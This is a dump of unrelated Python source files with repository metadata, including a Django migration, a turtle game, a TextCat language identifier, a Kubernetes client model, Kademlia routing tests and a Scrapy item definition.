                  disposable: BooleanDisposable, em: ExecutionModelMixin, sync_index: int):
        """Synchronously emit items for as long as acks arrive as ContinueAck.

        Exits by completing (iterator exhausted), rescheduling on an
        asynchronous ack, or cancelling when the downstream stops or the
        subscription is disposed.
        """
        while True:
            # try:
            ack = observer.on_next(current_item)
            # for mypy to type check correctly
            next_item: Optional[Any]
            try:
                next_item = next(self.iterator)
                has_next = True
            except StopIteration:
                has_next = False
                next_item = None
            except Exception as e:
                # stream errors == True
                self.trigger_cancel(scheduler)
                if not disposable.is_disposed:
                    observer.on_error(e)
                else:
                    scheduler.report_failure(e)
                has_next = False
                next_item = None
            if not has_next:
                try:
                    self.on_finish.dispose()
                except Exception as e:
                    observer.on_error(e)
                else:
                    observer.on_completed()
                break
            else:
                # next_index > 0: ack was synchronous -> keep looping;
                # next_index == 0: ack is asynchronous -> reschedule;
                # next_index < 0: downstream requested a stop.
                if isinstance(ack, ContinueAck):
                    next_index = em.next_frame_index(sync_index)
                elif isinstance(ack, StopAck):
                    next_index = -1
                else:
                    next_index = 0
                if next_index > 0:
                    current_item = next_item
                    sync_index = next_index
                elif next_index == 0 and not disposable.is_disposed:
                    self.reschedule(ack, next_item, observer, scheduler, disposable, em)
                    break
                else:
                    self.trigger_cancel(scheduler)
                    break
            # except Exception:
            #     raise Exception('fatal error')
| [
"michael.schneeb@gmail.com"
] | michael.schneeb@gmail.com |
4355cddb4a6bf72e8a7bb7c5cbf43fd7937c39d7 | 52c705205b243016c90757ed9d7332840277ce11 | /atracoes/migrations/0003_atracao_observacoes.py | ab7a3c8d0152bbe7326dde69447851f31aebcec9 | [] | no_license | lssdeveloper/pontos_turisticos | eb943549cb18561205818dcfb8c624bba32c7100 | 24852ca1b35795db876219a7a3439f496866d3d5 | refs/heads/main | 2023-04-03T10:24:22.000414 | 2021-04-15T20:13:02 | 2021-04-15T20:13:02 | 355,312,899 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 408 | py | # Generated by Django 3.1.7 on 2021-04-15 17:13
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated: add the optional 'observacoes' CharField to Atracao."""
    # Must run after the migration that added Atracao.foto.
    dependencies = [
        ('atracoes', '0002_atracao_foto'),
    ]
    operations = [
        migrations.AddField(
            model_name='atracao',
            name='observacoes',
            field=models.CharField(blank=True, max_length=50, null=True),
        ),
    ]
| [
"leandro.serra.10@gmail.com"
] | leandro.serra.10@gmail.com |
d9a18dc79e3f78292de7283cc85150a6221a6818 | 07841826ed64a7c6a21b79728f73748ac70dbbc1 | /1.2.2.py | 32cd6c3c38b89f023dcf0a64b287b3421998c263 | [] | no_license | riley-csp-2019-20/1-2-2-catch-a-turtle-leaderboard-illegal-Loli | 772859d28ae3b7b8d003febd1c57fd79b55907dc | 8648a790e039044b3ce722a53a8ec42e45d42488 | refs/heads/master | 2020-09-06T01:58:27.621209 | 2019-12-12T16:11:22 | 2019-12-12T16:11:22 | 220,279,845 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,622 | py | # a121_catch_a_turtle.py
#-----import statements-----
import turtle as trtl
import random
import leaderboard as lb
#-----game configuration----
# Target turtle appearance.
shape = "square"
size = 2
color = "brown"
score = 0  # running click count for this session
font_setup = ("Arial", 20, "normal")
timer = 10  # seconds of play time
counter_interval = 1000 #1000 represents 1 second
timer_up = False  # set True by countdown() when time runs out
#leaderboard variables
leaderboard_file_name = "a122_leaderboard.txt"
leader_names_list = []
leader_scores_list = []
player_name = input("please enter name")
#-----initialize turtle-----
# Amy is the clickable target the player chases.
Amy = trtl.Turtle(shape = shape)
Amy.color(color)
Amy.shapesize(size)
Amy.speed(0)
# 'ore' displays the score in the top-left corner.
ore = trtl.Turtle()
ore.penup()
ore.goto(-370,270)
font = ("comic_sans", 30, "bold")
# ore.write("text")
ore.ht()
# 'counter' draws the countdown timer text.
counter = trtl.Turtle()
#-----game functions--------
def turtle_clicked(x,y):
    """onclick handler: relocate Amy, show her, and bump the score.

    x, y: click coordinates supplied by turtle's onclick (unused here).
    """
    # print("Amy was clicked")
    change_position()
    Amy.st()
    score_counter()
def change_position():
    """Hide Amy and teleport her to a random spot on the board."""
    Amy.penup()
    Amy.ht()
    rand_x = random.randint(-400, 400)
    rand_y = random.randint(-300, 300)
    Amy.goto(rand_x, rand_y)
def score_counter():
    """Increment the global score and redraw it at the score turtle."""
    global score
    score += 1
    # print(score)
    ore.clear()  # erase the previous score before writing the new one
    ore.write(score, font =font)
def countdown():
    """Tick once per second; ends the game when the timer reaches zero."""
    wn.bgcolor("lightgreen")#my game change thing
    global timer, timer_up
    counter.penup()
    counter.goto(350,225)
    counter.ht()
    counter.clear()
    if timer <= 0:
        # Time is up: announce it, stop the game, show the leaderboard.
        counter.goto(0,80)
        counter.write("Time's Up", font=font_setup)
        timer_up = True
        game_over()
        manage_leaderboard()
    else:
        counter.write("Timer: " + str(timer), font=font_setup)
        timer -= 1
        # Re-arm this callback one counter_interval (1 second) from now.
        counter.getscreen().ontimer(countdown, counter_interval)
def game_over():
    """Switch to the end-of-game background and move Amy off screen."""
    wn.bgcolor("lightblue")
    Amy.ht()
    Amy.goto(500, 500)
# manages the leaderboard for top 5 scorers
def manage_leaderboard():
    """Load saved scores and record this run's score if it makes the top 5."""
    global leader_scores_list
    global leader_names_list
    global score
    global Amy
    # load all the leaderboard records into the lists
    lb.load_leaderboard(leaderboard_file_name, leader_names_list, leader_scores_list)
    # TODO
    # Qualifies if fewer than five saved scores exist or the new score
    # beats the current fifth-place score.
    if (len(leader_scores_list) < 5 or score > leader_scores_list[4]):
        lb.update_leaderboard(leaderboard_file_name, leader_names_list, leader_scores_list, player_name, score)
        lb.draw_leaderboard(leader_names_list, leader_scores_list, True, Amy, score)
    else:
        lb.draw_leaderboard(leader_names_list, leader_scores_list, False, Amy, score)
#-----events----------------
Amy.onclick(turtle_clicked)
wn = trtl.Screen()
wn.ontimer(countdown, counter_interval)
wn.mainloop() | [
"noreply@github.com"
] | riley-csp-2019-20.noreply@github.com |
fffaea4b5fab14b8a13db2f9f03a3f89301b5981 | 6f2d5600b65b062151bab88c592796b878de7465 | /Week_3/Class_0226/Function_2_tuple.py | 7e1d6989619b585a1d0dc0ad18f1c32533c6f469 | [] | no_license | zhouyanmeng/python_api_test | 1e6549321c20ee9a71beffac2533c917b5ecc157 | 7303352c9b5baacba5296b088f89ba4c702fb485 | refs/heads/master | 2022-12-17T14:34:26.351566 | 2019-03-01T13:02:06 | 2019-03-01T13:02:06 | 185,185,856 | 0 | 0 | null | 2022-12-08T01:45:15 | 2019-05-06T11:45:55 | Python | UTF-8 | Python | false | false | 420 | py | #####元组的内置函数 不可变元素,所有方法特别少
# Built-in tuple methods: tuples are immutable, so they expose very few.
t = ('rigth', 'sadness', '灰灰的', '柠檬', 'sadness', 'sadness')
# count(): how many times a value occurs in the tuple ('A' is absent -> 0).
res = t.count('A')
print(res)
# index(): position of the first occurrence; raises ValueError when the
# value is missing.  An optional start argument restricts the search.
res = t.index("rigth")
print(res)  # 0
res = t.index("sadness", 3)
print(res)  # 4
| [
"2440269710@qq.com"
] | 2440269710@qq.com |
0dce4ec9766df4f4af8856792758ec7b7d60a045 | adcbefa6cba639ec8c8eb74766b7f6cd5301d041 | /coffeehouse_nlpfr/classify/textcat.py | 32480de52dcff8dc955f48ed7948bedbc781b998 | [] | no_license | intellivoid/CoffeeHouse-NLPFR | b39ae1eaeb8936c5c5634f39e0a30d1feece6705 | 8ad1b988ddba086478c320f638d10d0c0cacca4c | refs/heads/master | 2022-11-28T02:13:40.670494 | 2020-06-07T04:02:00 | 2020-06-07T04:02:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,110 | py | # -*- coding: utf-8 -*-
# Natural Language Toolkit: Language ID module using TextCat algorithm
#
# Copyright (C) 2001-2019 NLTK Project
# Author: Avital Pekker <avital.pekker@utoronto.ca>
#
# URL: <http://nltk.org/>
# For license information, see LICENSE.TXT
"""
A module for language identification using the TextCat algorithm.
An implementation of the text categorization algorithm
presented in Cavnar, W. B. and J. M. Trenkle,
"N-Gram-Based Text Categorization".
The algorithm takes advantage of Zipf's law and uses
n-gram frequencies to profile languages and text-yet to
be identified-then compares using a distance measure.
Language n-grams are provided by the "An Crubadan"
project. A corpus reader was created separately to read
those files.
For details regarding the algorithm, see:
http://www.let.rug.nl/~vannoord/TextCat/textcat.pdf
For details about An Crubadan, see:
http://borel.slu.edu/crubadan/index.html
"""
from coffeehouse_nlpfr.compat import PY3
from coffeehouse_nlpfr.util import trigrams
if PY3:
from sys import maxsize
else:
from sys import maxint
# Note: this is NOT "re" you're likely used to. The regex module
# is an alternative to the standard re module that supports
# Unicode codepoint properties with the \p{} syntax.
# You may have to "pip install regx"
try:
import regex as re
except ImportError:
re = None
######################################################################
## Language identification using TextCat
######################################################################
class TextCat(object):
    # Class-level defaults; __init__ rebinds _corpus on the instance.
    _corpus = None
    fingerprints = {}
    _START_CHAR = "<"
    _END_CHAR = ">"
    last_distances = {}
    def __init__(self):
        # The third-party `regex` module is required because
        # remove_punctuation() uses the Unicode property class \p{P},
        # which the stdlib `re` does not support.
        if not re:
            raise EnvironmentError(
                "classify.textcat requires the regex module that "
                "supports unicode. Try '$ pip install regex' and "
                "see https://pypi.python.org/pypi/regex for "
                "further details."
            )
        from coffeehouse_nlpfr.corpus import crubadan
        self._corpus = crubadan
        # Load all language ngrams into cache
        for lang in self._corpus.langs():
            self._corpus.lang_freq(lang)
    def remove_punctuation(self, text):
        """ Get rid of punctuation except apostrophes """
        return re.sub(r"[^\P{P}\']+", "", text)
    def profile(self, text):
        """ Create FreqDist of trigrams within text

        Each token is wrapped in '<'/'>' boundary markers before its
        character trigrams are counted.
        """
        from coffeehouse_nlpfr import word_tokenize, FreqDist
        clean_text = self.remove_punctuation(text)
        tokens = word_tokenize(clean_text)
        fingerprint = FreqDist()
        for t in tokens:
            token_trigram_tuples = trigrams(self._START_CHAR + t + self._END_CHAR)
            token_trigrams = ["".join(tri) for tri in token_trigram_tuples]
            for cur_trigram in token_trigrams:
                if cur_trigram in fingerprint:
                    fingerprint[cur_trigram] += 1
                else:
                    fingerprint[cur_trigram] = 1
        return fingerprint
    def calc_dist(self, lang, trigram, text_profile):
        """ Calculate the "out-of-place" measure between the
            text and language profile for a single trigram """
        lang_fd = self._corpus.lang_freq(lang)
        dist = 0
        if trigram in lang_fd:
            # NOTE(review): the rank difference below is only meaningful if
            # both frequency distributions iterate their keys in frequency
            # order -- confirm that lang_freq() and profile() guarantee that
            # ordering; a plain insertion-ordered dict would not.
            idx_lang_profile = list(lang_fd.keys()).index(trigram)
            idx_text = list(text_profile.keys()).index(trigram)
            # print(idx_lang_profile, ", ", idx_text)
            dist = abs(idx_lang_profile - idx_text)
        else:
            # Arbitrary but should be larger than
            # any possible trigram file length
            # in terms of total lines
            if PY3:
                dist = maxsize
            else:
                dist = maxint
        return dist
    def lang_dists(self, text):
        """ Calculate the "out-of-place" measure between
            the text and all languages """
        distances = {}
        profile = self.profile(text)
        # For all the languages
        for lang in self._corpus._all_lang_freq.keys():
            # Calculate distance metric for every trigram in
            # input text to be identified
            lang_dist = 0
            for trigram in profile:
                lang_dist += self.calc_dist(lang, trigram, profile)
            distances[lang] = lang_dist
        return distances
    def guess_language(self, text):
        """ Find the language with the min distance
            to the text and return its ISO 639-3 code """
        self.last_distances = self.lang_dists(text)
        return min(self.last_distances, key=self.last_distances.get)
#################################################')
def demo():
    """Build a text sample for each UDHR language below, run TextCat on it,
    and print the detected ISO 639-3 code with a human-friendly name."""
    from coffeehouse_nlpfr.corpus import udhr
    langs = [
        "Kurdish-UTF8",
        "Abkhaz-UTF8",
        "Farsi_Persian-UTF8",
        "Hindi-UTF8",
        "Hawaiian-UTF8",
        "Russian-UTF8",
        "Vietnamese-UTF8",
        "Serbian_Srpski-UTF8",
        "Esperanto-UTF8",
    ]
    # Expected ISO 639-3 guess -> display name, used to label the output.
    friendly = {
        "kmr": "Northern Kurdish",
        "abk": "Abkhazian",
        "pes": "Iranian Persian",
        "hin": "Hindi",
        "haw": "Hawaiian",
        "rus": "Russian",
        "vie": "Vietnamese",
        "srp": "Serbian",
        "epo": "Esperanto",
    }
    tc = TextCat()
    for cur_lang in langs:
        # Get raw data from UDHR corpus
        raw_sentences = udhr.sents(cur_lang)
        rows = len(raw_sentences) - 1
        cols = list(map(len, raw_sentences))
        sample = ""
        # Generate a sample text of the language
        for i in range(0, rows):
            cur_sent = ""
            for j in range(0, cols[i]):
                cur_sent += " " + raw_sentences[i][j]
            sample += cur_sent
        # Try to detect what it is
        print("Language snippet: " + sample[0:140] + "...")
        guess = tc.guess_language(sample)
        print("Language detection: %s (%s)" % (guess, friendly[guess]))
        print("#" * 140)
if __name__ == "__main__":
    demo()
| [
"netkas@intellivoid.info"
] | netkas@intellivoid.info |
a60f708732cd173bb315e5f8aac3373e5d378180 | 31bc3fdc7c2b62880f84e50893c8e3d0dfb66fa6 | /language/python_27/built_in_functions/xrange_.py | 7bdc6a3472b618b41017ab38268da7e639255b1c | [] | no_license | tpt5cu/python-tutorial | 6e25cf0b346b8182ebc8a921efb25db65f16c144 | 5998e86165a52889faf14133b5b0d7588d637be1 | refs/heads/master | 2022-11-28T16:58:51.648259 | 2020-07-23T02:20:37 | 2020-07-23T02:20:37 | 269,521,394 | 0 | 0 | null | 2020-06-05T03:23:51 | 2020-06-05T03:23:50 | null | UTF-8 | Python | false | false | 713 | py | # https://docs.python.org/2/library/functions.html#xrange
def use_xrange():
    '''
    Demonstrate xrange() (Python 2 only).  Unlike range(), xrange() does not
    build a list up front; it returns a lazy xrange object (generator-like)
    while sharing range()'s signature: xrange(start, stop[, step]).
    '''
    x = xrange(1, 10)
    print(x) # xrange(1, 10)
    print(type(x)) # <type 'xrange'>
def supported_operations():
    '''
    Operations supported by xrange() objects (Python 2 only):
    - indexing
    - len()
    - "in" membership tests
    Slicing is NOT supported (the commented line below would raise TypeError).
    '''
    r = xrange(0, 10)
    print(r[1]) # 1
    print(len(r)) # 10
    #print(r[0:9:2]) # [0, 2, 4, 6, 8]
    print(5 in r) # True
if __name__ == '__main__':
#use_xrange()
supported_operations() | [
"uif93194@gmail.com"
] | uif93194@gmail.com |
d3205bd4ff23c60c90c8e9f539e38a4470e037fe | e77c683da89f4705b015e76f02486e7001d82697 | /kubernetes/client/models/v2_hpa_scaling_rules.py | c045f5d4dc20f9d483698b3f271d1b66d608fde0 | [
"Apache-2.0"
] | permissive | Sandello76/python-2 | 4027901d7a9a7d451146fafb844f242708784999 | e5f4520522681a8ec50052991d6226296dc0fb5e | refs/heads/master | 2023-01-21T11:17:31.697036 | 2022-04-12T11:43:35 | 2022-04-12T11:43:35 | 169,290,597 | 0 | 0 | Apache-2.0 | 2023-01-13T03:11:56 | 2019-02-05T18:29:08 | Python | UTF-8 | Python | false | false | 6,818 | py | # coding: utf-8
"""
Kubernetes
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
The version of the OpenAPI document: release-1.23
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from kubernetes.client.configuration import Configuration
class V2HPAScalingRules(object):
    """NOTE: This class is auto generated by OpenAPI Generator.
    Ref: https://openapi-generator.tech
    Do not edit the class manually.
    """
    """
    Attributes:
      openapi_types (dict): The key is attribute name
                            and the value is attribute type.
      attribute_map (dict): The key is attribute name
                            and the value is json key in definition.
    """
    # Attribute name -> declared OpenAPI type; drives to_dict()'s recursion.
    openapi_types = {
        'policies': 'list[V2HPAScalingPolicy]',
        'select_policy': 'str',
        'stabilization_window_seconds': 'int'
    }
    # Attribute name -> JSON key used on the wire.
    attribute_map = {
        'policies': 'policies',
        'select_policy': 'selectPolicy',
        'stabilization_window_seconds': 'stabilizationWindowSeconds'
    }
    def __init__(self, policies=None, select_policy=None, stabilization_window_seconds=None, local_vars_configuration=None): # noqa: E501
        """V2HPAScalingRules - a model defined in OpenAPI""" # noqa: E501
        # Fall back to a default client Configuration when none is injected.
        if local_vars_configuration is None:
            local_vars_configuration = Configuration()
        self.local_vars_configuration = local_vars_configuration
        self._policies = None
        self._select_policy = None
        self._stabilization_window_seconds = None
        # Generated models use `discriminator` for polymorphic schemas; this
        # model has none.
        self.discriminator = None
        # Assign through the property setters only when a value was given,
        # so unset fields remain None.
        if policies is not None:
            self.policies = policies
        if select_policy is not None:
            self.select_policy = select_policy
        if stabilization_window_seconds is not None:
            self.stabilization_window_seconds = stabilization_window_seconds
    @property
    def policies(self):
        """Gets the policies of this V2HPAScalingRules. # noqa: E501
        policies is a list of potential scaling polices which can be used during scaling. At least one policy must be specified, otherwise the HPAScalingRules will be discarded as invalid # noqa: E501
        :return: The policies of this V2HPAScalingRules. # noqa: E501
        :rtype: list[V2HPAScalingPolicy]
        """
        return self._policies
    @policies.setter
    def policies(self, policies):
        """Sets the policies of this V2HPAScalingRules.
        policies is a list of potential scaling polices which can be used during scaling. At least one policy must be specified, otherwise the HPAScalingRules will be discarded as invalid # noqa: E501
        :param policies: The policies of this V2HPAScalingRules. # noqa: E501
        :type: list[V2HPAScalingPolicy]
        """
        self._policies = policies
    @property
    def select_policy(self):
        """Gets the select_policy of this V2HPAScalingRules. # noqa: E501
        selectPolicy is used to specify which policy should be used. If not set, the default value Max is used. # noqa: E501
        :return: The select_policy of this V2HPAScalingRules. # noqa: E501
        :rtype: str
        """
        return self._select_policy
    @select_policy.setter
    def select_policy(self, select_policy):
        """Sets the select_policy of this V2HPAScalingRules.
        selectPolicy is used to specify which policy should be used. If not set, the default value Max is used. # noqa: E501
        :param select_policy: The select_policy of this V2HPAScalingRules. # noqa: E501
        :type: str
        """
        self._select_policy = select_policy
    @property
    def stabilization_window_seconds(self):
        """Gets the stabilization_window_seconds of this V2HPAScalingRules. # noqa: E501
        StabilizationWindowSeconds is the number of seconds for which past recommendations should be considered while scaling up or scaling down. StabilizationWindowSeconds must be greater than or equal to zero and less than or equal to 3600 (one hour). If not set, use the default values: - For scale up: 0 (i.e. no stabilization is done). - For scale down: 300 (i.e. the stabilization window is 300 seconds long). # noqa: E501
        :return: The stabilization_window_seconds of this V2HPAScalingRules. # noqa: E501
        :rtype: int
        """
        return self._stabilization_window_seconds
    @stabilization_window_seconds.setter
    def stabilization_window_seconds(self, stabilization_window_seconds):
        """Sets the stabilization_window_seconds of this V2HPAScalingRules.
        StabilizationWindowSeconds is the number of seconds for which past recommendations should be considered while scaling up or scaling down. StabilizationWindowSeconds must be greater than or equal to zero and less than or equal to 3600 (one hour). If not set, use the default values: - For scale up: 0 (i.e. no stabilization is done). - For scale down: 300 (i.e. the stabilization window is 300 seconds long). # noqa: E501
        :param stabilization_window_seconds: The stabilization_window_seconds of this V2HPAScalingRules. # noqa: E501
        :type: int
        """
        self._stabilization_window_seconds = stabilization_window_seconds
    def to_dict(self):
        """Returns the model properties as a dict"""
        result = {}
        # Recursively serialize nested models, lists of models, and dicts
        # whose values are models (anything exposing to_dict()).
        for attr, _ in six.iteritems(self.openapi_types):
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = list(map(
                    lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                    value
                ))
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = dict(map(
                    lambda item: (item[0], item[1].to_dict())
                    if hasattr(item[1], "to_dict") else item,
                    value.items()
                ))
            else:
                result[attr] = value
        return result
    def to_str(self):
        """Returns the string representation of the model"""
        return pprint.pformat(self.to_dict())
    def __repr__(self):
        """For `print` and `pprint`"""
        return self.to_str()
    def __eq__(self, other):
        """Returns true if both objects are equal"""
        # Structural equality via the serialized dict representation.
        if not isinstance(other, V2HPAScalingRules):
            return False
        return self.to_dict() == other.to_dict()
    def __ne__(self, other):
        """Returns true if both objects are not equal"""
        if not isinstance(other, V2HPAScalingRules):
            return True
        return self.to_dict() != other.to_dict()
| [
"yliao@google.com"
] | yliao@google.com |
cc31a73155bf7a1396a114b82259e779537e8ff9 | 9c63f6d39a6085674ab42d1488476d0299f39ec9 | /Python/LC_Kth_Largest_Element_in_an_Array.py | 7c993647bd88be65ae4b55dc5b44039e08b71761 | [] | no_license | vijayjag-repo/LeetCode | 2237e3117e7e902f5ac5c02bfb5fbe45af7242d4 | 0a5f47e272f6ba31e3f0ff4d78bf6e3f4063c789 | refs/heads/master | 2022-11-14T17:46:10.847858 | 2022-11-08T10:28:30 | 2022-11-08T10:28:30 | 163,639,628 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 474 | py | class Solution(object):
def findKthLargest(self, nums, k):
"""
:type nums: List[int]
:type k: int
:rtype: int
"""
# Solution 1
# There are different variations which you can do with heap. This is one of the smallest along with heapq.nlargest()
heapq.heapify(nums)
for i in range(len(nums)-k+1):
val = heapq.heappop(nums)
return(val)
| [
"noreply@github.com"
] | vijayjag-repo.noreply@github.com |
a277e9f184cbf53ef869869269365cfe9e69fd90 | fa51b088ea761b78cf0c85837fabaa0b7035b105 | /automl/snippets/language_sentiment_analysis_create_model.py | 40262aa4f637ba15df8f0e51fd488a2a48593cab | [
"Apache-2.0"
] | permissive | manavgarg/python-docs-samples | f27307022092bc35358b8ddbd0f73d56787934d1 | 54b9cd6740b4dbc64db4d43a16de13c702b2364b | refs/heads/master | 2023-02-07T21:18:15.997414 | 2023-01-28T18:44:11 | 2023-01-28T18:44:11 | 245,290,674 | 0 | 0 | Apache-2.0 | 2020-03-05T23:44:17 | 2020-03-05T23:44:16 | null | UTF-8 | Python | false | false | 1,697 | py | # Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
def create_model(project_id, dataset_id, display_name):
    """Start training an AutoML text-sentiment model and return the
    long-running operation handle."""
    # [START automl_language_sentiment_analysis_create_model]
    from google.cloud import automl

    # TODO(developer): Uncomment and set the following variables
    # project_id = "YOUR_PROJECT_ID"
    # dataset_id = "YOUR_DATASET_ID"
    # display_name = "YOUR_MODEL_NAME"

    client = automl.AutoMlClient()

    # Models are created under a Google Cloud Platform location resource.
    project_location = f"projects/{project_id}/locations/us-central1"

    # Leaving the base model unset trains against Google's default base model.
    model = automl.Model(
        display_name=display_name,
        dataset_id=dataset_id,
        text_sentiment_model_metadata=automl.TextSentimentModelMetadata(),
    )

    # Kick off training in that region; the call returns immediately with an
    # operation that tracks the training job.
    response = client.create_model(parent=project_location, model=model)

    print("Training operation name: {}".format(response.operation.name))
    print("Training started...")
    # [END automl_language_sentiment_analysis_create_model]
    return response
| [
"71398022+dandhlee@users.noreply.github.com"
] | 71398022+dandhlee@users.noreply.github.com |
15abe88a6ca070e5627b56fbc2a2561be4740ffb | 1bfb4df83565da98e0b7a2d25915370732b94b6a | /atcoder/abc188/e.py | 99f51f748eedd29f80e5a5a8462729e68334a149 | [
"MIT"
] | permissive | sugitanishi/competitive-programming | e8067090fc5a2a519ef091496d78d3154be98a2b | 51af65fdce514ece12f8afbf142b809d63eefb5d | refs/heads/main | 2023-08-11T02:48:38.404901 | 2021-10-14T14:57:21 | 2021-10-14T14:57:21 | 324,516,654 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 516 | py | import sys
sys.setrecursionlimit(10000000)
# Fast line-based input.
input=lambda : sys.stdin.readline().rstrip()
# n towns with gold prices a[i]; m one-way roads x -> y.
# NOTE(review): the backward sweep below assumes every road satisfies x < y
# (guaranteed by the problem statement) -- confirm before reuse.
n,m=map(int,input().split())
a=list(map(int,input().split()))
# dic[i] = [towns reachable directly from i,
#           best price obtainable from i onwards (init: -inf sentinel)]
dic=[ [[],-999999999999] for i in range(n)]
for i in range(m):
    x,y=map(int,input().split())
    x-=1
    y-=1
    dic[x][0].append(y)
ans = -999999999999
# Walk towns from last to first so each successor's best price is final
# before it is consumed (edges always point forward).
for i in range(n):
    i = n-i-1
    for v in dic[i][0]:
        dic[i][1]=max(dic[i][1],dic[v][1])
    if len(dic[i][0]):
        ans=max(ans,dic[i][1]-a[i])
    dic[i][1]=max(dic[i][1],a[i])
# Maximum profit of buying at one town and selling at a strictly later,
# reachable town (negative if every possible trade loses money).
print(ans)
| [
"keita.abi.114@gmail.com"
] | keita.abi.114@gmail.com |
30b3686a98f972e2165cd478547a8747479f63d1 | 8100f7895b257d15f19ca41f3ace9849647e49f8 | /kademlia/tests/test_routing.py | ecaf1ae63b4f57035578d0f86aa3bba57fb66c94 | [
"MIT"
] | permissive | bmcorser/kademlia | 90cac70a2853a759cf55d0651fbb125c50a5f5f5 | c6f1062082d7e3cb8b5af53bcc672b138848b337 | refs/heads/master | 2021-01-17T04:51:37.439919 | 2014-12-26T19:57:43 | 2014-12-26T19:57:43 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,856 | py | from twisted.trial import unittest
from kademlia.routing import KBucket, RoutingTable
from kademlia.protocol import KademliaProtocol
from kademlia.tests.utils import mknode, FakeProtocol
class KBucketTest(unittest.TestCase):
    def test_split(self):
        # Splitting a bucket over [0, 10] should partition both the ID range
        # and the two nodes at the midpoint.
        bucket = KBucket(0, 10, 5)
        bucket.addNode(mknode(intid=5))
        bucket.addNode(mknode(intid=6))
        one, two = bucket.split()
        self.assertEqual(len(one), 1)
        self.assertEqual(one.range, (0, 5))
        self.assertEqual(len(two), 1)
        self.assertEqual(two.range, (6, 10))
    def test_addNode(self):
        # when full, return false
        bucket = KBucket(0, 10, 2)
        self.assertTrue(bucket.addNode(mknode()))
        self.assertTrue(bucket.addNode(mknode()))
        self.assertFalse(bucket.addNode(mknode()))
        self.assertEqual(len(bucket), 2)
        # make sure when a node is double added it's put at the end
        bucket = KBucket(0, 10, 3)
        nodes = [mknode(), mknode(), mknode()]
        for node in nodes:
            bucket.addNode(node)
        for index, node in enumerate(bucket.getNodes()):
            self.assertEqual(node, nodes[index])
    def test_inRange(self):
        # Range bounds are inclusive on both ends.
        bucket = KBucket(0, 10, 10)
        self.assertTrue(bucket.hasInRange(mknode(intid=5)))
        self.assertFalse(bucket.hasInRange(mknode(intid=11)))
        self.assertTrue(bucket.hasInRange(mknode(intid=10)))
        self.assertTrue(bucket.hasInRange(mknode(intid=0)))
class RoutingTableTest(unittest.TestCase):
    def setUp(self):
        """Build a fresh fake protocol / routing table pair for each test."""
        self.id = mknode().id
        self.protocol = FakeProtocol(self.id)
        self.router = self.protocol.router
    def test_addContact(self):
        """Adding one contact yields one bucket containing that one node."""
        self.router.addContact(mknode())
        # The original used assertTrue(len(...), 1): assertTrue treats its
        # second argument as a failure *message*, so the count was never
        # actually checked.  assertEqual performs the intended comparison.
        self.assertEqual(len(self.router.buckets), 1)
        self.assertEqual(len(self.router.buckets[0].nodes), 1)
| [
"bamuller@gmail.com"
] | bamuller@gmail.com |
3925169a07bd92641cd6ea6064b96ecd6c232bde | d93c91e904470b46e04a4eadb8c459f9c245bb5a | /banglore_scrape/acresrent/acresrent/items.py | a1fc474292c3702617c42d5875f953929b5aaf90 | [] | no_license | nbourses/scrappers | 3de3cd8a5408349b0ac683846b9b7276156fb08a | cde168a914f83cd491dffe85ea24aa48f5840a08 | refs/heads/master | 2021-03-30T15:38:29.096213 | 2020-03-25T03:23:56 | 2020-03-25T03:23:56 | 63,677,541 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,429 | py | # -*- coding: utf-8 -*-
# Define here the models for your scraped items
#
# See documentation in:
# http://doc.scrapy.org/en/latest/topics/items.html
import scrapy
class AcresrentItem(scrapy.Item):
    """Item holding one scraped 99acres property listing.

    Every attribute is a free-form scrapy.Field(); the attribute names are
    the dictionary keys that spiders and pipelines populate, so they must
    stay exactly as spelled below.
    """
    # Cleanups vs. the original: removed the scaffold comments and the
    # redundant trailing `pass`, and normalized spacing around `=`.
    carpet_area = scrapy.Field()
    updated_date = scrapy.Field()
    management_by_landlord = scrapy.Field()
    areacode = scrapy.Field()
    mobile_lister = scrapy.Field()
    google_place_id = scrapy.Field()
    Launch_date = scrapy.Field()
    Possession = scrapy.Field()
    age = scrapy.Field()
    address = scrapy.Field()
    price_on_req = scrapy.Field()
    sublocality = scrapy.Field()
    config_type = scrapy.Field()
    platform = scrapy.Field()
    city = scrapy.Field()
    listing_date = scrapy.Field()
    txn_type = scrapy.Field()
    property_type = scrapy.Field()
    Building_name = scrapy.Field()
    lat = scrapy.Field()
    longt = scrapy.Field()
    locality = scrapy.Field()
    price_per_sqft = scrapy.Field()
    Bua_sqft = scrapy.Field()
    Status = scrapy.Field()
    listing_by = scrapy.Field()
    name_lister = scrapy.Field()
    Selling_price = scrapy.Field()
    Monthly_Rent = scrapy.Field()
    Details = scrapy.Field()
    data_id = scrapy.Field()
    quality1 = scrapy.Field()
    quality2 = scrapy.Field()
    quality3 = scrapy.Field()
    quality4 = scrapy.Field()
    scraped_time = scrapy.Field()
| [
"karanchudasama1@gmail.com"
] | karanchudasama1@gmail.com |
